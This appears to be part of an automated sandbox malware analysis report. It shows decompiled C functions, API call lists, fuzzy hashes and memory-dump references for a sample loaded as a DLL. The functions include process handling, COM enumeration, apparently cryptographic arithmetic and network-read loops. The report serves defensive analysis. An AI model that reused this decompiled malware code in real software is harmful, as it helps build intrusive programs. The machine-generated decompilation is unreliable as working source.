Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 6D47F6B9

Part of subcall function 6D47ECCC: RtlEncodePointer.NTDLL(00000000), ref: 6D47ECCF
Part of subcall function 6D47ECCC: __initp_misc_winsig.LIBCMT ref: 6D47ECEA

__mtterm.LIBCMT ref: 6D47F6C7
__initptd.LIBCMT ref: 6D47F70E
GetCurrentThreadId.KERNEL32 ref: 6D47F715

Memory Dump Source

Source File: 00000000.00000002.925010654.000000006D47E000.00000020.00020000.sdmp, Offset: 6D47E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d47e000_loaddll32.jbxd

Similarity

API ID: CurrentEncodePointerThread__init_pointers__initp_misc_winsig__initptd__mtterm
String ID:
API String ID: 4000030184-0
Opcode ID: 3cea36875566d1462413e4872919144d8403e955b025f094296832058c1fd2c5
Instruction ID: 9339f7d88fb749b277262bf36e0cbe5804d45b217ac182875e7576d68f95598d
Opcode Fuzzy Hash: 3cea36875566d1462413e4872919144d8403e955b025f094296832058c1fd2c5
Instruction Fuzzy Hash: 4AF0963265F6225EEB34BAB5AD01FE627A4DF01278B32162EE670D52E0FF51DC0145D4

Uniqueness

Uniqueness Score: -1.00%

Function 00DE4C1B, Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00DE4C1B(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0xdea2c4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0xdea2b4 = _t4;
				_t6 = GetCurrentProcessId();
				 *0xdea2b0 = _t6;
				 *0xdea2bc = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0xdea2ac = _t7;
				if(_t7 == 0) {
					 *0xdea2ac =  *0xdea2ac | 0xffffffff;
				}
				return 0;
			}

0x00de4c23
0x00de4c2b
0x00de4c30
0x00000000
0x00de4c7d
0x00de4c32
0x00de4c3a
0x00de4c7a
0x00000000
0x00de4c7a
0x00de4c3c
0x00de4c41
0x00de4c53
0x00de4c58
0x00de4c5e
0x00de4c66
0x00de4c6b
0x00de4c6d
0x00de4c6d
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00DE6B4E,?,?,00000001), ref: 00DE4C23
GetVersion.KERNEL32(?,00000001), ref: 00DE4C32
GetCurrentProcessId.KERNEL32(?,00000001), ref: 00DE4C41
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 00DE4C5E
GetLastError.KERNEL32(?,00000001), ref: 00DE4C7D

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 5f4bbabcae041cf904755e8e347c471278a9998974d06fa41d3712aceeef1b5d
Instruction ID: cc461499db1d73e68dec72d2e867b0710df4be76613a6c71d764764081f57bc4
Opcode Fuzzy Hash: 5f4bbabcae041cf904755e8e347c471278a9998974d06fa41d3712aceeef1b5d
Instruction Fuzzy Hash: E2F09070A46382AFD760FF7AAC99B157B64A704744F60911AE246EE3F0D371A001CF3A

Uniqueness

Uniqueness Score: -1.00%

Function 00DE6C6D, Relevance: 6.2, APIs: 4, Instructions: 152
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00DE6C6D(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0xdea2d4; // 0x2f2d5a8
					_t5 = _t102 + 0xdeb038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0xde92b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0xdea2d4; // 0x2f2d5a8
												_t28 = _t108 + 0xdeb0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0xdea2d4; // 0x2f2d5a8
														_t33 = _t78 + 0xdeb078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}

0x00de6c72
0x00de6c7b
0x00de6c7c
0x00de6c80
0x00de6c86
0x00de6c8c
0x00de6c95
0x00de6c9b
0x00de6ca5
0x00de6ca7
0x00de6cad
0x00de6cb2
0x00de6cbd
0x00de6cc5
0x00de6cc8
0x00de6deb
0x00de6cce
0x00de6cce
0x00de6cdb
0x00de6ce1
0x00de6ce7
0x00de6ceb
0x00de6cf1
0x00de6cfe
0x00de6d02
0x00de6d08
0x00de6d0b
0x00de6d11
0x00de6d17
0x00de6d1d
0x00de6d20
0x00de6d23
0x00de6d29
0x00de6d32
0x00de6d38
0x00de6d39
0x00de6d3c
0x00de6d3d
0x00de6d3e
0x00de6d46
0x00de6d47
0x00de6d48
0x00de6d4a
0x00de6d4e
0x00de6d52
0x00000000
0x00000000
0x00de6d58
0x00de6d61
0x00de6d67
0x00de6d71
0x00de6d75
0x00de6d77
0x00de6d84
0x00de6d88
0x00de6d90
0x00de6d95
0x00de6da7
0x00de6da9
0x00de6daf
0x00de6daf
0x00de6db8
0x00de6db8
0x00de6dba
0x00de6dc0
0x00de6dc0
0x00de6dc3
0x00de6dc9
0x00de6dcc
0x00de6dd5
0x00000000
0x00000000
0x00000000
0x00de6dd5
0x00de6d29
0x00de6d23
0x00de6d0b
0x00de6ddb
0x00de6ddb
0x00de6de1
0x00de6de1
0x00de6de7
0x00de6de7
0x00de6df0
0x00de6df6
0x00de6df6
0x00de6cb2
0x00de6dff

APIs

SysAllocString.OLEAUT32(00DE92B0), ref: 00DE6CBD
lstrcmpW.KERNEL32(00000000,0076006F), ref: 00DE6D9F
SysFreeString.OLEAUT32(00000000), ref: 00DE6DB8
SysFreeString.OLEAUT32(?), ref: 00DE6DE7

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 23ff91f40558c92005fd2926e26e2be3062d622552dd2ae20ec041a7547aad22
Instruction ID: 8f9cbf290325b8d4e881635cb8725918093ae8b641a5b74e9633cdf366c97832
Opcode Fuzzy Hash: 23ff91f40558c92005fd2926e26e2be3062d622552dd2ae20ec041a7547aad22
Instruction Fuzzy Hash: 00514D75E0055AEFCB01EFA9C8888AEB7B5EF89344B144598E915EB314D731AD01CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00DE5D93, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00DE5D93(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E00DE28F1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E00DE1000(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E00DE3915(_t101,  &_v428, _a8, _t96 - _t81);
					E00DE3915(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E00DE1000(_t101,  &E00DEA188);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E00DE1000(_a16, _a4);
						E00DE3B6F(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L00DE7D8C();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L00DE7D86();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E00DE679F(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E00DE5AC5(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00DE4A54(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E00DEA188) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x00de5d96
0x00de5da2
0x00de5da8
0x00de5dad
0x00de5db1
0x00de5f23
0x00de5f27
0x00de5f27
0x00de5db7
0x00de5dbb
0x00de5dc1
0x00de5dc2
0x00de5dcd
0x00de5dd3
0x00de5dd8
0x00de5ddb
0x00de5df5
0x00de5e04
0x00de5e10
0x00de5e1a
0x00de5e1f
0x00de5e21
0x00de5e24
0x00de5edb
0x00de5ee1
0x00de5ef2
0x00de5f05
0x00de5f1b
0x00000000
0x00de5f20
0x00de5e2d
0x00de5e34
0x00de5e38
0x00de5e3e
0x00de5e40
0x00de5e42
0x00de5e44
0x00de5e46
0x00de5e50
0x00de5e55
0x00de5e57
0x00de5e59
0x00de5e5a
0x00de5e5b
0x00de5e5c
0x00de5e63
0x00de5e6a
0x00de5e6d
0x00de5e6d
0x00de5e3a
0x00de5e3a
0x00de5e3a
0x00de5e75
0x00de5e7d
0x00de5e89
0x00de5e8e
0x00de5e8e
0x00de5e93
0x00000000
0x00000000
0x00de5e95
0x00de5e98
0x00de5ea5
0x00000000
0x00000000
0x00de5ea7
0x00de5ea7
0x00de5eb4
0x00de5e8e
0x00de5e93
0x00000000
0x00000000
0x00000000
0x00de5e93
0x00de5ebe
0x00de5ec1
0x00de5ec4
0x00de5ecb
0x00de5ecb
0x00de5ed8
0x00000000
0x00de5ed8
0x00de5dc4
0x00de5dc8
0x00de5dc9
0x00de5dcb
0x00000000
0x00000000
0x00000000
0x00de5dcb
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 00DE5E46
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00DE5E5C
memset.NTDLL ref: 00DE5F05
memset.NTDLL ref: 00DE5F1B

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 974c4192ee25351e1770b914086e2f27351e5f5c6da3b48de336204742979122
Instruction ID: 05b1a455f465919b556c9a20f469defd82b3d3e89d678e540ae705baeaca274d
Opcode Fuzzy Hash: 974c4192ee25351e1770b914086e2f27351e5f5c6da3b48de336204742979122
Instruction Fuzzy Hash: 4641F131A00299AFDB20FF6ADC81BEE7375EF45754F004169F809A7285DB70AE448BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00DE14A8, Relevance: 6.1, APIs: 4, Instructions: 120
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00DE14A8(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78);
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_push( &_v24);
							_push(1);
							_push(0);
							if( *0xdea144() != 0) {
								_v8 = 8;
							} else {
								_t47 = E00DE6837(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0xdea2c4, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55);
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E00DE50CA(_v20);
											if(_v8 == 0) {
												_v8 = E00DE37FC(_v24, _t74);
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E00DE25C7(__eax);
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}

0x00de14a9
0x00de14af
0x00de14ba
0x00de14ba
0x00de14bc
0x00de5aff
0x00de5b02
0x00de5b0b
0x00de5b0e
0x00de5b11
0x00de5b19
0x00de5c17
0x00de5c22
0x00de5c25
0x00de5c27
0x00000000
0x00de5c27
0x00de5b1f
0x00de5b22
0x00de5c2a
0x00de5c2a
0x00de5b28
0x00de5b2b
0x00de5b2c
0x00de5b2e
0x00de5b37
0x00de5c0e
0x00de5b3d
0x00de5b43
0x00de5b4a
0x00de5b4d
0x00de5bfc
0x00de5b53
0x00000000
0x00de5b53
0x00de5b53
0x00de5b53
0x00de5b53
0x00de5b58
0x00de5b5a
0x00de5b5a
0x00de5b67
0x00de5b6f
0x00000000
0x00000000
0x00de5b71
0x00de5b7e
0x00de5b84
0x00de5b84
0x00de5b87
0x00000000
0x00000000
0x00de5b89
0x00de5b94
0x00de5ba8
0x00de5bde
0x00de5baa
0x00de5baa
0x00de5bb1
0x00de5bb9
0x00000000
0x00de5bbb
0x00de5bbb
0x00de5bc6
0x00de5bc9
0x00de5bd0
0x00000000
0x00de5bd0
0x00de5bc9
0x00de5bb9
0x00de5be1
0x00de5be4
0x00de5bec
0x00de5bf7
0x00de5bf7
0x00000000
0x00de5bec
0x00de5b91
0x00000000
0x00de5bd3
0x00de5bd3
0x00000000
0x00de5bdc
0x00de5c03
0x00de5c03
0x00de5c09
0x00de5c09
0x00de5b37
0x00de5b22
0x00de5c34
0x00de14b1
0x00de14b1
0x00de14b8
0x00de14c3
0x00000000
0x00000000
0x00000000
0x00de14b8

APIs

WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00DE7134,00000000,?), ref: 00DE5B9B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00DE7134,00000000,?,?), ref: 00DE5BBB

Part of subcall function 00DE25C7: wcstombs.NTDLL ref: 00DE2687

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: ErrorLastObjectSingleWaitwcstombs
String ID:
API String ID: 2344289193-0
Opcode ID: df750b5b469e9df70468b4d898d0e0e9aea0159c100de809891384da28791777
Instruction ID: cb57e4202f33c9090553921b79bb0baac9dad644e5ddb4e26d11094efa61e3e3
Opcode Fuzzy Hash: df750b5b469e9df70468b4d898d0e0e9aea0159c100de809891384da28791777
Instruction Fuzzy Hash: 48414E74901689EFDF20FFA6E984AADB7B9FB04388F244469E502E7254D7309E40DB71

Uniqueness

Uniqueness Score: -1.00%

Function 00DE73C3, Relevance: 6.1, APIs: 4, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00DE73C3(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0xdea2c8; // 0xbd092303
				_t32 = _a4;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0xdea2d4; // 0x2f2d5a8
				_t3 = _t8 + 0xdeb8a2; // 0x61636f4c
				_t25 = 0;
				_t30 = E00DE2DEA(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0xdea2f8, 1, 0, _t30);
					E00DE50CA(_t30);
				}
				_t12 =  *0xdea2b4; // 0x2000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 != 0 && E00DE513E() == 0) {
						_t28 =  *0xdea120( *_t32, 0x20);
						if(_t28 != 0) {
							 *_t28 =  *_t28 & 0x00000000;
							_t28 =  &(_t28[1]);
						}
						_t31 = E00DE6BE1(0, _t28,  *_t32, 0);
						if(_t31 == 0) {
							if(_t25 == 0) {
								goto L21;
							}
							_t31 = WaitForSingleObject(_t25, 0x4e20);
							if(_t31 == 0) {
								goto L19;
							}
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t31 = E00DE51A8(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}

0x00de73c4
0x00de73cb
0x00de73d5
0x00de73d9
0x00de73df
0x00de73ec
0x00de73f3
0x00de73f7
0x00de7409
0x00de740b
0x00de740b
0x00de7410
0x00de7417
0x00de7422
0x00de7438
0x00de743c
0x00de743e
0x00de7443
0x00de7443
0x00de7450
0x00de7454
0x00de7458
0x00000000
0x00000000
0x00de7466
0x00de746a
0x00000000
0x00000000
0x00de746a
0x00de7454
0x00000000
0x00de746c
0x00de746c
0x00de746c
0x00de7472
0x00de7474
0x00de7474
0x00de747e
0x00de7482
0x00de7494
0x00de7494
0x00de7498
0x00de749e
0x00de749e
0x00de74a1
0x00de74a3
0x00de74a6
0x00de74a6
0x00de74ad
0x00de74b3
0x00de74b3

APIs

Part of subcall function 00DE2DEA: lstrlen.KERNEL32(E8FA7DD7,00000000,63699BC3,00000027,00000000,03D19C98,745EC740,00DE55DE,?,63699BC3,E8FA7DD7,00000000,?,?,?,00DE55DE), ref: 00DE2E20
Part of subcall function 00DE2DEA: lstrcpy.KERNEL32(00000000,00000000), ref: 00DE2E44
Part of subcall function 00DE2DEA: lstrcat.KERNEL32(00000000,00000000), ref: 00DE2E4C

CreateEventA.KERNEL32(00DEA2F8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,00DE30E1,?,?,?), ref: 00DE7402

Part of subcall function 00DE50CA: RtlFreeHeap.NTDLL(00000000,00000000,00DE4239,00000000,00000001,?,00000000,?,?,?,00DE6B8D,00000000,?,00000001), ref: 00DE50D6

WaitForSingleObject.KERNEL32(00000000,00004E20,00DE30E1,00000000,?,00000000,?,00DE30E1,?,?,?,?,?,?,?,00DE211B), ref: 00DE7460
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,00DE30E1,?,?,?), ref: 00DE748E
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,00DE30E1,?,?,?), ref: 00DE74A6

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 78fc33be3dfd9f276d71e27b492fdcef31f697a1d91cf5aeea94cda64ee2684c
Instruction ID: 0f2fb736061d7952dc2ffcc7cee56bb0f2ba7f47787d885a8b826b9c9bc03ced
Opcode Fuzzy Hash: 78fc33be3dfd9f276d71e27b492fdcef31f697a1d91cf5aeea94cda64ee2684c
Instruction Fuzzy Hash: 4C21D2329057925BC7617BAA9C84B5A7BA8AB44760F490624FE01EB381E770DC008771

Uniqueness

Uniqueness Score: -1.00%

Function 00DE3032, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00DE3032(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E00DE6710(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E00DE15B9(_t23);
						}
					}
					return _t38;
				}
				if(E00DE4C8C(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0xdea2f8, 1, 0,  *0xdea394);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E00DE4039(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E00DE1D57(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E00DE3C84(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E00DE73C3( &_v32, _t39);
					goto L13;
				}
			}

0x00de3032
0x00de303f
0x00de3045
0x00de3046
0x00de3047
0x00de3048
0x00de3049
0x00de304d
0x00de3059
0x00de305d
0x00de30e5
0x00de30e5
0x00de30e8
0x00de30ea
0x00de30f2
0x00de30f8
0x00de30fb
0x00de30fb
0x00de30f8
0x00de3106
0x00de3106
0x00de3070
0x00de3072
0x00de3072
0x00de3089
0x00de308d
0x00de3090
0x00de309b
0x00de30a2
0x00de30a2
0x00de30ae
0x00de30af
0x00de30bd
0x00de30b1
0x00de30b1
0x00de30b2
0x00de30b3
0x00de30b4
0x00de30b5
0x00de30b6
0x00de30b6
0x00de30c2
0x00de30c7
0x00de30c9
0x00de30cb
0x00de30cb
0x00de30d2
0x00000000
0x00de30d4
0x00de30d4
0x00de30e1
0x00000000
0x00de30e1

APIs

CreateEventA.KERNEL32(00DEA2F8,00000001,00000000,00000040,?,?,73BCF710,00000000,73BCF730,?,?,?,?,00DE211B,?,00000001), ref: 00DE3083
SetEvent.KERNEL32(00000000,?,?,?,?,00DE211B,?,00000001,00DE560C,00000002,?,?,00DE560C), ref: 00DE3090
Sleep.KERNEL32(00000BB8,?,?,?,?,00DE211B,?,00000001,00DE560C,00000002,?,?,00DE560C), ref: 00DE309B
CloseHandle.KERNEL32(00000000,?,?,?,?,00DE211B,?,00000001,00DE560C,00000002,?,?,00DE560C), ref: 00DE30A2
